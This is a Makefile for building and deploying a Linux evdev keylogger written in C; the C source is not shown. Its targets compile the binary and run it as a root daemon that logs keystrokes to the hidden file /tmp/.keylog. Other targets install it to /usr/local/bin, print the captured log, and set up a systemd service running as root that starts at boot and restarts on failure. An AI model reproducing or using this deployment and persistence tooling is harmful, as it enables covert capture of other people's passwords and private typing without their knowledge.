# ============================================================
# Makefile for keylogger in C (Linux evdev)
# Supports config.mk generated by ./configure
# ============================================================

# Default variables (can be overridden by config.mk or environment)
CC       ?= gcc
CFLAGS   ?= -Wall -Wextra -O2 -pedantic
LDFLAGS  ?= -lrt
SOURCE   ?= keylogger.c
TARGET   ?= keylogger

# Paths
LOG_FILE  ?= /tmp/.keylog
PID_FILE  ?= /tmp/keylogger.pid
INSTALL_DIR ?= /usr/local/bin
BIN_PATH   := $(INSTALL_DIR)/$(TARGET)

# Compile-time defines (overridable)
DEFS     ?= -DLOG_FILE=\"$(LOG_FILE)\"

# Include generated configuration if present
-include config.mk

# Colours for output (optional)
RED    := \033[0;31m
GREEN  := \033[0;32m
YELLOW := \033[0;33m
NC     := \033[0m

# ============================================================
# Targets
# ============================================================
.PHONY: all run stop status read install uninstall clean restart install-service

all: $(TARGET)

$(TARGET): $(SOURCE)
	@echo "$(GREEN)Compiling $(TARGET)...$(NC)"
	$(CC) $(CFLAGS) $(DEFS) -o $@ $^ $(LDFLAGS)
	@echo "$(GREEN)Build successful: ./$(TARGET)$(NC)"

# ============================================================
# Run (as daemon)
# ============================================================
run: $(TARGET)
	@if [ -f $(PID_FILE) ] && kill -0 $$(cat $(PID_FILE)) 2>/dev/null; then \
		echo "$(YELLOW)Keylogger already running (PID $$(cat $(PID_FILE))).$(NC)"; \
	else \
		echo "$(GREEN)Starting keylogger daemon...$(NC)"; \
		sudo ./$(TARGET); \
		sleep 1; \
		if [ -f $(PID_FILE) ] && kill -0 $$(cat $(PID_FILE)) 2>/dev/null; then \
			echo "$(GREEN)Keylogger started with PID $$(cat $(PID_FILE)). Log: $(LOG_FILE)$(NC)"; \
		else \
			echo "$(RED)Error: failed to start keylogger.$(NC)"; \
			exit 1; \
		fi; \
	fi

# ============================================================
# Stop
# ============================================================
stop:
	@if [ -f $(PID_FILE) ]; then \
		PID=$$(cat $(PID_FILE)); \
		if kill -0 $$PID 2>/dev/null; then \
			echo "$(YELLOW)Stopping keylogger (PID $$PID)...$(NC)"; \
			sudo kill $$PID; \
			rm -f $(PID_FILE); \
			echo "$(GREEN)Keylogger stopped.$(NC)"; \
		else \
			echo "$(RED)Process $$PID no longer exists. Removing PID file.$(NC)"; \
			rm -f $(PID_FILE); \
		fi; \
	else \
		PID=$$(pgrep -x $(TARGET) | head -1); \
		if [ -n "$$PID" ]; then \
			echo "$(YELLOW)Keylogger running (PID $$PID) without PID file. Stopping...$(NC)"; \
			sudo kill $$PID; \
			echo "$(GREEN)Stopped.$(NC)"; \
		else \
			echo "$(RED)No running keylogger found.$(NC)"; \
		fi; \
	fi

# ============================================================
# Status
# ============================================================
status:
	@PID=$$(pgrep -x $(TARGET) | head -1); \
	if [ -n "$$PID" ]; then \
		echo "$(GREEN)Keylogger is running with PID $$PID.$(NC)"; \
		if [ -f $(PID_FILE) ]; then \
			echo "PID file matches: $$(cat $(PID_FILE))"; \
		else \
			echo "$(YELLOW)No PID file, but process exists.$(NC)"; \
		fi; \
	else \
		echo "$(RED)Keylogger is not running.$(NC)"; \
	fi

# ============================================================
# Read log
# ============================================================
read:
	@if [ -f $(LOG_FILE) ]; then \
		if [ -n "$(LINES)" ]; then \
			tail -n $(LINES) $(LOG_FILE); \
		else \
			tail -n 20 $(LOG_FILE); \
		fi; \
	else \
		echo "$(RED)Log file $(LOG_FILE) does not exist.$(NC)"; \
	fi

# ============================================================
# Install / Uninstall
# ============================================================
install: $(TARGET)
	@echo "$(GREEN)Installing $(TARGET) to $(INSTALL_DIR)...$(NC)"
	sudo cp $(TARGET) $(BIN_PATH)
	sudo chmod 755 $(BIN_PATH)
	@echo "$(GREEN)Installation complete. Type '$(TARGET)' from anywhere.$(NC)"
	@echo "$(YELLOW)Note: root or 'input' group membership required to run.$(NC)"

uninstall:
	@if [ -f $(BIN_PATH) ]; then \
		echo "$(YELLOW)Removing $(BIN_PATH)...$(NC)"; \
		sudo rm -f $(BIN_PATH); \
		echo "$(GREEN)Uninstalled.$(NC)"; \
	else \
		echo "$(RED)Binary not installed at $(BIN_PATH).$(NC)"; \
	fi

# ============================================================
# Clean
# ============================================================
clean:
	@echo "$(YELLOW)Cleaning...$(NC)"
	rm -f $(TARGET) *.o config.mk
	@echo "$(GREEN)Clean complete.$(NC)"

# ============================================================
# Restart
# ============================================================
restart: stop run

# ============================================================
# systemd service
# ============================================================
install-service:
	@echo "Creating systemd service..."
	@printf "[Unit]\nDescription=Keylogger\nAfter=network.target\n\n[Service]\nExecStart=$(BIN_PATH)\nRestart=always\nUser=root\n\n[Install]\nWantedBy=multi-user.target\n" | sudo tee /etc/systemd/system/keylogger.service > /dev/null
	sudo systemctl daemon-reload
	sudo systemctl enable keylogger
	sudo systemctl start keylogger

# ============================================================
# Help
# ============================================================
help:
	@echo "Available targets:"
	@echo "  all           Build the keylogger"
	@echo "  run           Start the daemon (sudo)"
	@echo "  stop          Stop the daemon (sudo)"
	@echo "  status        Check if running"
	@echo "  read [LINES=N]  View log (last N lines, default 20)"
	@echo "  install       Install to /usr/local/bin (sudo)"
	@echo "  uninstall     Remove from /usr/local/bin (sudo)"
	@echo "  restart       Stop then start"
	@echo "  clean         Remove build artifacts"
	@echo "  install-service  Install as systemd service (sudo)"
	@echo ""
	@echo "Config file: /etc/keylogger.conf or ~/.keylogger.conf"
	@echo "CLI options: ./$(TARGET) --help"
